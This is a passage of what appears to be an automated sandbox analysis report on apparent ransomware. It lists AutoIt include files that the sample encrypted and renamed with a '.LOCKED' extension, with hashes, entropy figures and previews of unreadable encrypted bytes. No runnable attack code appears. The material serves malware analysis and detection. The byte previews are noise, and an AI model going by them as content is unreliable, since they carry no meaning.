..p........<9....>.1lrR....!..R..c.CL....(.R..4@C...A......kfp,..E..yJ..pi.}.>...b..!.f...........4..;......'.....]..%v..e..~.~.......)......._..T....#."7:_b...jo,.@...T....mLe.2.]...*f6Y....u.....[,..4:`K<-.&..1&...`iw..N..7.053....^F.A...QJ........|.)E.L.K"..>..3.........d...U@.3..?dB...|"...&ty.vydH....2....F...n.+_....>.........`2...=....r.bS3.Uy.3..r...97...."`1...M.4h`x..

                                C:\Program Files (x86)\autoit3\Include\ToolbarConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):14341
                                Entropy (8bit):7.987830222270157
                                Encrypted:false
                                SSDEEP:384:xkauvt1+daIWOPrEiDtSNryP2BvKmC17gYwn+VOq:xkauvtwdQO4eSNryO8f7xq+
                                MD5:067F1517FD4BDFB132D8357C76907A22
                                SHA1:5D76C35435FA39632757800F4DEDC293D2F30F99
                                SHA-256:4DD510C1088B44DC099292A4C202DD4AC6277BABAABEEF153BE9030808D8E80B
                                SHA-512:FBBE0A2C846BF624814E17ACDD0D5D17683B34C5A7241D6AE2F1106B2DABCDE8BDF9A56F1C15323ECBE4FE68F821CB5BEC9CEAD0192A096404524392711B207E
                                Malicious:false
                                Preview:.~....H1 .O..S.q.=...I.O.*+...._p.R..gp...(.j....`...u...n..KOr..`lo........M.:>.}..,(....*/..X...A.].u.RLx..9..t.Y.TO.GO.}...'........g.{..m.L........]t....sf....`...s...>.V\.>`F.O_....H-....>..t.......ZF...E....oD...W.<I.Z.;{Z.,X.=.+i..QzG.U........&?Qf.....U..GQ..G/...^.z...B....dG.`|.z.......S.q..(...VI.....nD.N.nG.X"..__..%......Lz..@:.h.....,....y......3...'.0...R.iiV...J.IV..^e3.0.........w.0.(@{l(..g.....:......QZwt"Ax..p..V........2..8..x.mo......;v...j...Y..Y.#.P./..%oluz.....+Bd(I.57N.[.V.W.......S'.....W.?.7.R z...>.=.m..P2&...ulS.....$?...B.O....V.-wF^e3...;..C...0...<|0.L2..',v..C.'[b...4bXZ]u.&v..V.........v.......Q.......f.....yf..../......r....uQV~......m..=3.*.x.....%P...X......;H..+.n..+....Q.?.P.d..#.F,..!...'.h..k..S.. ...s5.o?.C.c|.#..k...h.Te...#.y_.......8.<.g........>.......JE[ ..u..5&AEd....q(...z.....u....K!..,|hk...Ql........*.@.s..].H.V.Q........*^.......r..BCE.Rq.....Y9..].+..!a.....w./]..F=s.3]!.:?

                                C:\Program Files (x86)\autoit3\Include\TrayConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3273
                                Entropy (8bit):7.938864640053381
                                Encrypted:false
                                SSDEEP:96:WhYNSWoCkVxnn72cRtBDYKlOuvrYHevuAVOe:Whe/oCkznnycRtBDYK1ru+VOe
                                MD5:40FEE7ED1E55A9D50C78235CFD7A64BA
                                SHA1:C85876704CF0017949E9D5E8636CA8C2F2C47BE9
                                SHA-256:B5D56330E8F19FE93DD2342CE6E7A31CCB8511EEB52B7764D50F12E2F130C698
                                SHA-512:22AAF118BC3D76EFC5995C24228CC633B281ECC0EDD9D8D42A1E58BE742B64C26D882AC85624704226D71400628A396375980A1A6B7C0B0417BED2D5B9C3DFBE
                                Malicious:false
                                Preview:#xC.Cg..*....`.fek.G..3q......d.)..B..9....R.I...y.....S+.6u..i.4.P.e.9.-.Xp.)._J...Eh.X....H.S..2.P.".]R'.Q....@...'.kS..Z.......b..U8j......@KKl.8.@DH.DO.l.jl.^"S{..zH%.?.6.Al...u...I3.m=.z.....76..a.^...e........+..tl...u....au8&..k.>j&...... |....63.........lzw.....*...[.).L..d........A.>....\..".....m..N.n."W...7......Z.C...-.%..M......'.......!..bd$B....i.,O.kP..."..F/.g.....$..{...?.:.8S..{.l..p...!....I........G..g..@yw..F.!.r.6z..DpM.@i.H..6*.fe[..x...tP...b..j....w.R...._...E.....Nr.p..E.C.D9%...h....8....1+.D...L...I....w.0..j..k.7f.a9....54.b..]..J..e{.......X7..[.[.\...7..~e..T?x..'/;r...2....._U..}po.}=3.....hj!UIbk$..8.2./...W.:..s....9.Kl.;E<Y.Y...1.......U..A....;h...j...O.p.xj./.Y.3...z..|...i....)....f lM/.hsrD.].....&.K.rV/.4A_.h.......wWG.v....K.e).2.#.\...~U.r...7.9RF....z.C... ....\.T...G....q.xS...:...0.9....b.g..R.Vt...GJ(.v)l...a..@........^G.M.......Rf>..s$J..'.s....]...~S...R.....|].BL...%.^0m?^n...}.....$S.

                                C:\Program Files (x86)\autoit3\Include\TreeViewConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10009
                                Entropy (8bit):7.982759594693455
                                Encrypted:false
                                SSDEEP:192:6lTT74659Fb/M6Du5WwxoquGq5LE3ryMhR2CGsl2d+VOF:yDpb/MBP+qTpdhR2Cf2d+VOF
                                MD5:09894C57565368FD054FFE7D6DA7DD63
                                SHA1:EC8ED863644CCBCC63FAA0EEBEF9605EBDEA7DAA
                                SHA-256:8DB5FDDC74AE0C456D8F0F1DCFB380F5B3D3E8E0D14343EA85C2A18855DFC171
                                SHA-512:0EF28457976A8E6A64573C7C2B847158BD7E85ECD3058D29CEE1DCFFDD0BFE289AB6FF84EBD14B8B39CCB8EE3E548B9B58B3F90A3D2FD04DB56A7D8879B4BFCB
                                Malicious:false
                                Preview:L.O.../6T9..i%.....F.T`..x......[........$vw.%.}.<.....p.b.s..W.~.]\S........a. s...*..mV.=..(.*IA.S..D....q}%.(K....=,..r%8.%=..'..'o...........s...I...E&h.v.D,.x..?.....|8..{....#F..=..{EQ..,D.b....ad.]...j.."(....!6C.C..,F.I.s.I...i@..J..YL..b...tWT.Tt;5..vD.........\.a....`.-....zq.`....N.....1..f...t0..,.^...,l.w...'.?..%~z."..VRu.$...@.@@.?...m.78~..C.Al[..*.P.4*...K....'..g~......B=5T..)!.......ZsC....MT.@.a......]:Y2......Lgi~.iG.#."T."1.e.W[....d..Up.2K..Q.kS..X.K....2..y.'..Bbr....H.5.dX._...........G..d.e2l....3\..x....K:2;..a.B..q.h_..c;......f...cXG"z5J.z<O......d.....>.Y.8_P.w.......}g?..5{...q~c.?l.2T..sE]R.vL....I.........N...@C....q~......Y.m4..qiP.i.......cSV.....Z...4.a..)i3.3Mq.wBy. ).g9...[.../.M.E.wk.Z.k._>..T.`Q.._.{....$......C.*.w.....R..{7X..dZ#.9.F3...Y.5d.;._..)~........6%X..#j.g.....v\..-.H].M#w.=...X0.A.....D.UA..-dgQ.~...2.4..Z\.......Sz.<.....^....V../..."..[.".<..."f4../.*.......v.a.LI...8lS....v.u.

                                C:\Program Files (x86)\autoit3\Include\UDFGlobalID.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7297
                                Entropy (8bit):7.975410771018185
                                Encrypted:false
                                SSDEEP:192:n86N8K7e//WyGCRx0kx+DP4QpkCpHqAaXerbe7E1S8W+VOv:/z7UOY0HkwHKerbe7yS8W+VOv
                                MD5:F5FE8E66FF5745735032F6C4C75CF857
                                SHA1:462E7DAF0FD229CE183ED705B92C2013B185BE0D
                                SHA-256:E7BC6D464EA6E77C5A892A49E9A708D10096D560F8110781537C64A291DF57AB
                                SHA-512:1FB2A3365A3D6CEA00524CD4B185F814CE7653239A05EB9ADC72B95AFE463EDBED5250D0F169617BB2BE5F92A28E563339C20FD3D9A39784F9FE2A412A2D5A13
                                Malicious:false
                                Preview:.R..M........o.b.J.{z.....h.....:....*QM..s.*6:.H.........3(.!*.u...o...V.vS.?m..k.G_hdVz..3a.sB.PE.t;c.0o;A.......,...X.$.+.9./.6..-.x._ ...+.i.........p[......A!~...ZCW.R.CrU.g....9x2..U..`LA.=.M.*P%mZ...;..;e.z.....9Qm...-w.T;1.03.....@.B?.E!q.d6......w.@&E.fsR[..y..F..>|I.......G\Ec.>.2X"0.n.....|q..L._..J..?x.I. ....%]@k..Z.... ..G$..Wa...:G.X,....o[.X..I...O..}.....<H..|.%Q'.^h..m..z....8.Ip.@....(.......'.....B/..&....34..a'r....9gTg..{s1.Zpt.....H....G...Wh.P..3.(......q....n.m....*4.3...4.h%.[..z."&..f...Kz..wq../...W..]'./A.{.-J..j1.?........R.xl&......$/5.e.F..{..."9~...T...V+@@+.A.$..gH...R.i.".E....zZ........W%.6.s....q..........xOF.|..ep.S..U........+Rc.....!...DU?..-D._ ....fG..s;..%.N,X>rQ..dW.T..k.........j*..h....*.H...r..p .8.4..g...g.U...;..@...z..^...;.]..#..d.....M.....{0.aV..S$..()[......`~Z...!7.G.G.!......F>z.+[...."...._vt.M.(=F.p...].X.....u%;.....|.'!.....M....TSj....FO...E.. Z...X...9.WK.%i.....f.L..m..?`

                                C:\Program Files (x86)\autoit3\Include\UIAWrappers.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):110649
                                Entropy (8bit):7.998577390807684
                                Encrypted:true
                                SSDEEP:1536:b+zJ499sDgfP9aYIDzb0RG6ve8dFdVjzNRC5My7CrFUX9wBqjoZfbTZNplHMrDcx:biJ499sDg8YuAveIVjDqHGRbzT3s8x
                                MD5:8524DE3FCD7AE23F7D7A9CEEFADA7CF4
                                SHA1:A34EA92656E68D9F408C7362D40ACBD805522986
                                SHA-256:C4FA6FB9E8614F7D572FF693ED8A41CDFED4D094D947CF22380D2889DCA70698
                                SHA-512:C99811C3BD781128FC679B40F88E1F4A204717007161E390881712575D95F763D5D28301F5EE70097EB0C217687458AE0609DA17748ED89578F3E543BDA13F40
                                Malicious:true
                                Preview:ZAE...8.Wu.2..r..#../..............R..q=.|"f.....@...: ..{n`f..!K....8.....`..xl.k..y....{...ed...k.).J.5.n.\..N.N.@._.wb.c.Q.sO..0li...Dv.DA)..Q8he..@..iQ.v.L.K\......T)..y.t...w.....R.P&..q../;.Q_...w.......O9.x..KA..F.~..............s...<2....p.......4_...w.....%u.m..j"[_.E.fFUH}".s..Q.R.\...f.H.'...#....]....L..e......?....v...~....?..O+.V.+.D....Z=....@..Z...9...<....lw\g.....f'....g..%.g`.)!....."..y..~....No.Yy..Io6.R>E.rP.R.lC...C...../..I...0.....1..n... ....n..m..-....|...i.....K..]u...o.'...Pkf.fuQp%.t.1...^.:.._.......ie`..w....]3....P...=:..l..r...\:.;g.F.....z.8d@...[^B.....r.?G...[m...o......7..TA;0....(....n?{w....R..B.(%.C,......\iI.h.+C..J.....>/..[..G.=..G....q.........!.}..=.3.....R7.7.T......M;..`....g..*..'.d2.9....N....=n.%....q.Z...q"=.by.._.....g...n!..f.'w............t{D..g.=...`(......W...~$..0.....c.o.K.;.....}..1.<.3...r.V.oN.~..8p..1....s..v^.1..Y?......D.y...}y.}.@x......767AGg..k.#S.{.#tL.

                                C:\Program Files (x86)\autoit3\Include\UpDownConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1759
                                Entropy (8bit):7.867088924016625
                                Encrypted:false
                                SSDEEP:48:7Sjc0wCFkZlwMf7IfeZ/WyYu+MAVMJg6T1j:7SrwYkZl5f7xevuAVOZ
                                MD5:89C66F176FD881CC66FE355194FC62F4
                                SHA1:776A2298CD9B2D1A31F44530CA55D2C34ABB3290
                                SHA-256:70F5C7709A1885CAF92AA16E34424A27338FCA2239C66ABFFA4A4AF5AFBFDE1F
                                SHA-512:46498D02B2D98DADCFD88C1E094474B9951534AD6C00E11AC476A9D654BC93F8EB5BB3105EDDCB8F12F96DE831B6695D57C07D118330A691102DB7524CC6B03B
                                Malicious:false
                                Preview:Qlp.c.a7....C.n..8...N.=q...j...&_*.9.RJ.u9...#l.0s...'..3{j.%....L.*....r:rYl=....9mY..`#...t..M66<...Q^....<.....Aco..+A.~n. Bme....q.Z.[.3.B..d.a.v....S....)...j...{l.>.;{RC.J.C.N..p.}[ .7-.!2..S.../;p..O/ ...X2..Z..8B.H......j92...._p..&...^..[ .....b~.1....._....$.`.~.......fE%,gDV @9AG...K..To$...'J.\....rD..y..i.8.D<....9 W.......q?.QP.f..m.}.m...aH.$..4.q.Z..P....Sb....k6r6*.:.......f&[j....'...d...#J....=..dg.~.*.W.........nm..>FmN_......u...."......!.D......|.....$......n..>..h....<.;...R.H>..l.m..bc..*.5o...d..7.....S<pM..%f..&.B..>.0.V..+.NKNV./+...Z.&I.g....%...l...#N.d....0.6..%..6.:..!x.kz._.......3}.....[....3...4...=.).S~.4.P^.../..U..-....C.;.........Z.@..Z.p!.....Ux...c.`.d...h..B.h.Hr.U.<".;..?.^..]...'....a.g.I.b...{c.{..(.^.<......{-......G.<L.....>.>q..y*..!Q[~...C..i}.(...M>.....8%...n.<W..-OT2....R.`..j[oiDrW.V!B._@F..l_...;k.g.y.....]..0'.V..4.....A....j..../...Xl....[.!.Wuv.D....|.9.....-..T4....)..{...

                                C:\Program Files (x86)\autoit3\Include\Visa.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40581
                                Entropy (8bit):7.9951768017936375
                                Encrypted:true
                                SSDEEP:768:jvs/ZJkMnuTVLnDZY6xH1J5xfcyDhrM4jgMayXpApR2MXShT0LSoPlmSxRVS0i:sZSMniDS+Vvxf1NIzM7ERGhT0LSoPlFk
                                MD5:64B7397C9B6F61D857A2D0B9F426C05B
                                SHA1:FEA3235CB5AB6757ABC09FFF6B1DF6476F2A8FF4
                                SHA-256:1D99FE25D330E8C7782A8455F191FA388430DB7916FD96395E6D534138137B86
                                SHA-512:0F49762524B68536A71E89A7FCAA1AEE5A8C308144A7328E45356F4D65627C81592E1DF2254750B30669BFACA51605A0563F9212253609576CF0CC5DA737AD08
                                Malicious:true
                                Preview:Q.CC.4!X>G. ... ......0.87PdH.!|....QJa.{.!.......S.*6@..b..>.O..9.E..)|..a.Y...].v.}|..}...V.e.F...8.kw...B.u.!g....!..:V..$<.f/K......!?.5.D.....f...u...v.n..W...$...{....x.Ej-..j..D...Ms.Ki....IO.9f.v:..L.Lu%Go............/.$L7/.J.R`6....w_.K.C...n.o.[wP.4.}.0)\.-.D...K..N..Y..$..$.;..^...R....'......q..N..m..m....y.u>R..1.......D?..G.q;r.........d...W..#.r.L30..j7qSY.i...0...S..t..5.9b.i..h.1k...p5........Yf9../:.z|.<........0%.p....)....j.f:....`.$..a6..s.V.e.=.....}.=OY.S. {D,WU.)._..Wr.*.R.W..O<..p..|v.Q..Z..??.....+.....5v..}........7<.........<.+._'n...B...y&.$.#S.K..O..~.O.,......,.r...'.?.><n.}Z_...q+.Q[..O..%f.......`.7}.i.5H....5..........b..9>..h...X]..u....t..Pk..J.u'.iU......1A>uG.B...b.6#m..G...n......./]5|w..>......>!%..*%KA..ww> .A?X<.|l.......4..).2..l.e..........5|1.......2......&...*.B.V...{.....L..p;y.p.c@.d.<..D;..Y".....`.*....KS#..i!.......~..k.Q.4..Z..._.U.3\..o.h..?..... ...B.S...2.....Z.......U...

                                C:\Program Files (x86)\autoit3\Include\WinAPI.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2128
                                Entropy (8bit):7.902718904780669
                                Encrypted:false
                                SSDEEP:48:Kf/L5JPVZ3ZAmu60vzb4+6agFfCo8tRN/WyYu+MAVMJg6T5w:EL5Z3ZAm4GagWNevuAVOi
                                MD5:39409E191C1069EB52B277F43BFD5576
                                SHA1:A33B93FEDA63A97277AD08A50C8EEFEAA4377420
                                SHA-256:23FC7C293A383FCA53476195FFD4986F42097A0A154596F4B42A96BE9A6E4F89
                                SHA-512:FB79DDCA32BC73DFE7FEB2C5A4E75354CE2B1D84F6EB9E2F1BBFBC6C90C80C69A0C12C29B7A38C4D0FD713CD171AA0C0CFE1D7D0A057C0E166FDE9519D4BDA85
                                Malicious:false
                                Preview:.;$.2.d....W...k9..`.CF.@....vE.......".A..n.....`2H.f.<..N.....z..t<X0y.?.[....<..L...3....*?.l.60.<<.?_Z*.HC.9..zi.#..AV.v...q..;..`..jt.i..=.O.......qi...q..,q.*%z.ul..7....#.w.B..../......E...He.....GzX...c.}... <yM .Hy..F..P..z..n..I.r.G|...n.....0e.H...dFn.M..da......m...F...k./@W.....R...9.f...gm..I.s.&.I....E&...O.K...O..z.......{xAe.l.!..E..B.%,\./....f+mS%.-)+..V.0~.._.g>g...~.....U$4>.2..*G.D3w8|.%.F......m...d..8...,l..1.%[."..m..OjnE]...K.U.e.....~>.$.F....jc.........Y_A....1:.&..'..5.".....2../.@....[E...^...F?0$;.<r...}..L}*..|9[...T..2.Gm.iZ.kER....Y....J..5.i..g...a....C\Eb.[...A.....U....[..8.}04+I1eK0r.....Y...w..e.+j7...Z.}~a'...2O.C..z........2...i.T.vG..<.d.X..]~. =.... .B...v..........jf..{T..n..\..Ig.*.AVR...kC..Y"..4.=&.3..$..D<1.K.{......".<..Q.35.,n.C:.M.....v..w.....J..UD."..QFG.:.aE$.^.. .8r..fZ...3Q..:.*S.:...N~I...ND.6../..L.....P....i.tg5f.......L.p..p....-...tX.kh.....,.J".:7g..:.w....j.w..{..."....|..J

                                C:\Program Files (x86)\autoit3\Include\WinAPICom.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10082
                                Entropy (8bit):7.981733784576309
                                Encrypted:false
                                SSDEEP:192:Svq8vhPXwMxpfkO1ASsvPHE3Uci3v8QUjcGAyi+99+VOA:SvZPgMxpxsvc3Bi3v8Hjcqv+VOA
                                MD5:BE4D5BEF4B7E200A8F58F52C29EBF202
                                SHA1:EE381169A0D617C7BB7A9D8B79D0F928F5DF9B00
                                SHA-256:1CF9C28DCB5C388FB4AD385674731643B4C30C4E8D017F1F26F245BF4733E11D
                                SHA-512:8613EB1FECC7DD6F5434CEF2769F634AA4DC72CBBCBD0346218CA468AF2ACACD26C8E9FA14876BE93F0CC1AAB5249EBE26883F85A9CE010E10156D5C9B7E330F
                                Malicious:false
                                Preview:._.:.K...V...b.RD..5.]T..x/n.z:..:.$y....v..W....4&.{...V..;.s/..K..*c....s`.G`Y....g...#..E.....T.g.N.e...w.....6F.......^Rx.PN..a.e.o.'r6~.%.vH...2iL[M.*C..D..[nM.....5[...e..?'..\.$....3..44..R......fxB.UD|#....A.x2..5r1ol[..nn..[ ......D.3....q....Y.I..6.F.W\k..P...... J.......}.xR.:..m..F.x..e.I.RO.O"U.....~().wBEc...%....ia..@.Y..]G.....E?..........30.7V...*....O....s+M}.O...,I.;9>.U:......A..x.Oo>_t..U.D.z.*..4.Lq..I.G..a..-....[$c.9.~..e8<..9.C.{y.u|.......G5...1.L.D....=..........81.jR.$...e..p.g/v/.Ow;.j...L.C....7G..\!(.e..S....1......=.$.......S[ZU[.fU..]....3.]6...D.A,.E..T....U.P%...&...~`.M,.C.Ml..eb..,.....+.. .)..a.. .K.7......!.]Ws.Mm.1m...<........S...|K.).^..Wd.\....7..j...Y.........4..A...Qz.j.T.S:1..zO>)...Y|>C.'[.G4...(..u]....bs.. +.{...0..*F\..y/.Nv:q%<.[..y..lq..Ci'.....j.T....O}....{...........9..b;_.|.......L"L.W.^_.a..#....p....>41.>..,^..u..D........6.Jd..A..\..X_.....dU..xVf.R.!...9......]..y...1..YH7.

                                C:\Program Files (x86)\autoit3\Include\WinAPIConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6066
                                Entropy (8bit):7.972090817515263
                                Encrypted:false
                                SSDEEP:96:DBDHvWtj5yyukkKAuI0VtCqCKr1+SkstB6/+gcsxBmqS+X3HgevuAVOuC:FDHONzBAuI0rFCKZ7P6Ggvf6aXg+VOh
                                MD5:449FF52EFC7F09FDD5922019ACD03292
                                SHA1:87240B46CB67A486380D14471ADC0B410AB1B3AA
                                SHA-256:684857B10C84FCE80E94BA379C6EAC8F506ADB8DC997FEE67A2303C34E8ECDFB
                                SHA-512:31C7CA95FBD416B12330E4E4B6D1FF11639127D2471D20CCB83465FCCB438D32CADDD44991A8B538E19FEFF45A818CFD462A1472A16803F952AFC37D27D3BCF4
                                Malicious:false
                                Preview:..}........H.H...Dw.YJK.)....D.).J..>..L.....r......N.7.:.g..G.........Y..Lb.O.K..nl..$c.(b..`...p.rNrN.v..Z..Quw..Y........R#.(.6Cz+un.6H.:.....k.........C......]."....w.b...`...W..A[........D..xGI.9..cxP....^..l.f..T.)[4C-.f..|..k.dyJs/..C!.....L...-W.R(Z.b.<X.i.....&.../J..i..l.6.....b~.._o..PWrd...P..1.z..3G....#.8...N:r.t......i..........Y.A..6.....+..`...a..d...P..s........Yp....LC....*.=...Y.......5..L...6...\.v{Pn...].W..1p..R......I....D.....% ...z....U~.....".M.N...E}.....v.u.n........f.r. x..j...v_w.O........G..ko..]...G... A7.IE.....0k?D.....#,.Z.*..]#.:s.H(n..J..!.g.......\.:.MN{o..M.-...Pw..2....{F..\....*..Y;iDt./....%O.I\K,...D.W(.w.7.$.].T.X.$.u.$.uKx....!.........u.% "bB..Ex.d....c&..D..@.&.A...p".(.PP."v.0+....."!M.]..k:z....J..eG.w...w.tS.......L.f*.U.c.|..5..Ou..?.J<]^7.t.....p...v...hdc..P5,.0....).:u..N....,....?.....v8...TJ....?*i.p.....1..@../*C.`xK..........i,..l$.+.1...y.G./$... q[.Z.kNJ....OI..f/}]g../'..

                                C:\Program Files (x86)\autoit3\Include\WinAPIConv.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):30168
                                Entropy (8bit):7.994481161928793
                                Encrypted:true
                                SSDEEP:768:YNU7Tg00l1SPbp6HgFvIJrAG/P0Yuu7WNYFdf:Fng0c0UgdIRHUY9I85
                                MD5:74020D873E06EECCAFE0D4CE11146CFC
                                SHA1:70C2D7CB0898F567772D6C34B5BC813335C7F116
                                SHA-256:EAE73B968C0CD53327458886310F82B9C83066E17F360886179B6407352CD18D
                                SHA-512:6ABA26998DF21A8F49B6F30A032D534F7AC4220ABCEEBEB4BCC5AA558B200A49ACAF0185C7C0F26773AFA1E176E97B1AFDD67A24A1E957E54D2D20EEE42890D1
                                Malicious:true
                                Preview:.o...1.J.`....eK.P+.k.,|./|.....ya......l.N.s.y....%M.ir.n.R..u.~...bGW.z.];-...=.i1..........G...NC%.jm....P.....puNU..v..6eop...).d....@q..;C...m..;.....3...B.&Ba.wI.G....v...$..d.k<....nW.g".T.d.j...3T'.}..d".,.....tb*=#..g........mg]}.+fs..L.J......x..U..\.v.oI5....7n.#...u.v/....[..lB}{qp.?.A^QO.@..........?..........9....'M.&x..=n..'.%9.....K.I(....HFEC........J. b.$.....L^I.}.s]...G....p)...{.....Y.......XB..$...W..x.5..-......CC.6t......5..k.;.....c..6.7..Two......=...8."..>u.1.96.;.;.....o.e%k=...\x.B.VG..%.H.._@.+..`.$.._2.L..".F....e.y1G0..?.S.i....P.....ms.&T.t5.Y..&..+0.]*..-....c..p..f....A..~.Yu....IZ.\._R..2.}...u.u9..g...yx.;..&....K..7.M.......)..#Y..Bs......3...`$....{.......a.f........l ....$lHS..A....5...l..@.M........`~..].-.U.. .BW}.....Tw?_.f.>..[........{j...q@L..LG...xk.....6jn(....._.$.......g..(..T.`;.'q.k.#mq.....rW..0.o0..%..,/.ih......^.w.....]...[b......4.}...$....^x......Fh.z......)..q..d..&s.$R...*!.

                                C:\Program Files (x86)\autoit3\Include\WinAPIDiag.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33490
                                Entropy (8bit):7.9948156280750355
                                Encrypted:true
                                SSDEEP:768:ligBB+TXUL1Z3KfD3M1QK/2mx0L3KPU+zh8ePIXPfF5NqmqY:ligBB+TXUJZ3QD8r2mx0L+NFJw15Nq+
                                MD5:90D91CAD42D4582941239C027FA6E5CF
                                SHA1:450207A06D3F90BA710AC58E4DF1FA0FEDD6FBD9
                                SHA-256:A797AFD81ED1E0442E3011C2E007BC44F2AF799516CA25EF46886320C86FEC57
                                SHA-512:8C97E2A2975F5E5D4E2C87D16BFC1037B0F9DF70F7E51E5C3DFB60DCC7F2CA421DC5AD17AC914CD3C205EAC05AAC5E3882385F161D12AA86E71CBD65DC95F35B
                                Malicious:true
                                Preview:YuB.I...&.....5\.g..6..15./...c..B..ip..qB......%~%....g).9.........B59.....T....3...E@i.;..tv.n...c.M1#..c..X.;s...%................C.c..e.c+h.+.W..xqq8.J...sS>-B..\...P_h....3.$...54Q..=..&....~Bq....d...9d....!m.r....(.A..b.#<F.j......~.4.UN%10..#...j.K).H.....^.e+W..E._..P/.%.GB.j......N...@...q[;......y7.;G...D.r.Fa..o.D.IV..i.9...h`4,.o.....>..y..c.n.z...S. ..>..1...f..;......?Z.g...]].q.......^g.....]2..6...0^.....n..?.J...#.:lB.-....8.h.....T.K...Q...Bt..17...?..FU....8..-.lY..N.B;*..d..O......<]|...zI.V.......Qh0C..Hq.s......,.=....(.... &..4.Y...E...^H..kL7.3.#`....E.pw.a.&....`.y.lo......5.1.8.......s..td6.X.....t.0CJEAu0_..<.v....=....O.\....f.XRR.u!..v..B.h..1,......q.9...:0.W.3.T.4J.......?..C.%.........Q.D...C~.......D....x.*H.$(VrL....L.%.....5.|5.L.N.w..C.0.. ....K6. 1.......P...]e.....h.....eLq..o8'..Do. *..D..y.....=...?.......i.......8..6ra...E.T..T(...j@.A]!.=...,.e.>+.....;..e...,...KWt...z3.sb...{..

                                C:\Program Files (x86)\autoit3\Include\WinAPIDlg.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):39594
                                Entropy (8bit):7.994625408041425
                                Encrypted:true
                                SSDEEP:768:3WZXM1+ZRpeKcLtQKJDFbxfvlZC4D6QhlemYoFxSIEmOAcRp7TZfFM/RL:IRpeKatHBxXSc1hle2WPAcRp5ts
                                MD5:F114C3EC82259355422D39744E3DBC59
                                SHA1:9E814BC8EDE2AEAE39CC069D96FD49319C8CDB85
                                SHA-256:BFFC2973CB5B92AFA61A27B557C5089BD2555648FF7E2140088A360901118A04
                                SHA-512:18D43FC74EF7E602A7644D642F8054E70604A35133360E296E56A6AB131FB23291F0F277EC8505BD074907762FB31E26F687E510E86920464C2471BC232E0D17
                                Malicious:true
                                Preview:.......;.8.&$.9T)..d.J.0z.2A..**.."'l..a.7..KZ...X.....1z.....X..+q..RS.c..t..7...y..7JK.....*.]=...,x?....kL..rWu..4..Z.W5e...S.....[.M..O.{}4.$...^u.8..k..e_..x..Z.a.........@..[.vav.....S2..Q....U..;V'-p ..8..uUP.<)h6@.....H..Al......t..B.]V.o(.e....v.I....wy.#{[.&I.|:....h.lX.@.o$...Oq......u...'{.M|.........n..eU9'F.....G>..h".W1.........|$&.X.R.3..........e.]......._....d.,.(....b_%......G.VE.b.My.h..vG...W..S(..DA5d...}........\.fz..LR..L.e..Q\Gq~..^%BT0....`..A.-....t....Ow.4.K."K(...0..rFG{u..mfQ.P..D..x.{_U.@.......|^..U..G.W.x0..F......S...U..U$..5.Z.!QR.g.M..;.y.I......l.4y..6...........i?.f3..^.}.M).v...{...D1..vjY.@...E.4.(Zd....T...].?,{1..8...b...m.4p.....9-A...f.c@CR.Q..Oc..x..._~..'.......k...........C7Z}...h.C...T]....8>}.%.,.'..`_g..5...\........4B..y.....<..4Q.'.0....)..../...8S...8..TX3.x9.H...|.....!...p.q}.......^....V.N"`=.j8...~+.[..fU.r3 !.M.Q.a..*..{..R....6Igj.f.^.....NOw...5..|..z..%.9.w..;.m..?...1....L.._...q.

                                C:\Program Files (x86)\autoit3\Include\WinAPIError.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:PGP Secret Sub-key -
                                Category:dropped
                                Size (bytes):12615
                                Entropy (8bit):7.98572150547311
                                Encrypted:false
                                SSDEEP:384:Uux+VS3JVTjm4Dzt+qp+l8jXGY1JDUGpv+VOX1:nxg6K4DpmjADbL1
                                MD5:33797C6A0930B40CB083058C0657921B
                                SHA1:EE461057C59EDBE3A6A667CD124519D2C8DDFCA3
                                SHA-256:04F822E42C0875ECBF5123795070B47791909FDDBC7ADA4942B178DD928F90FE
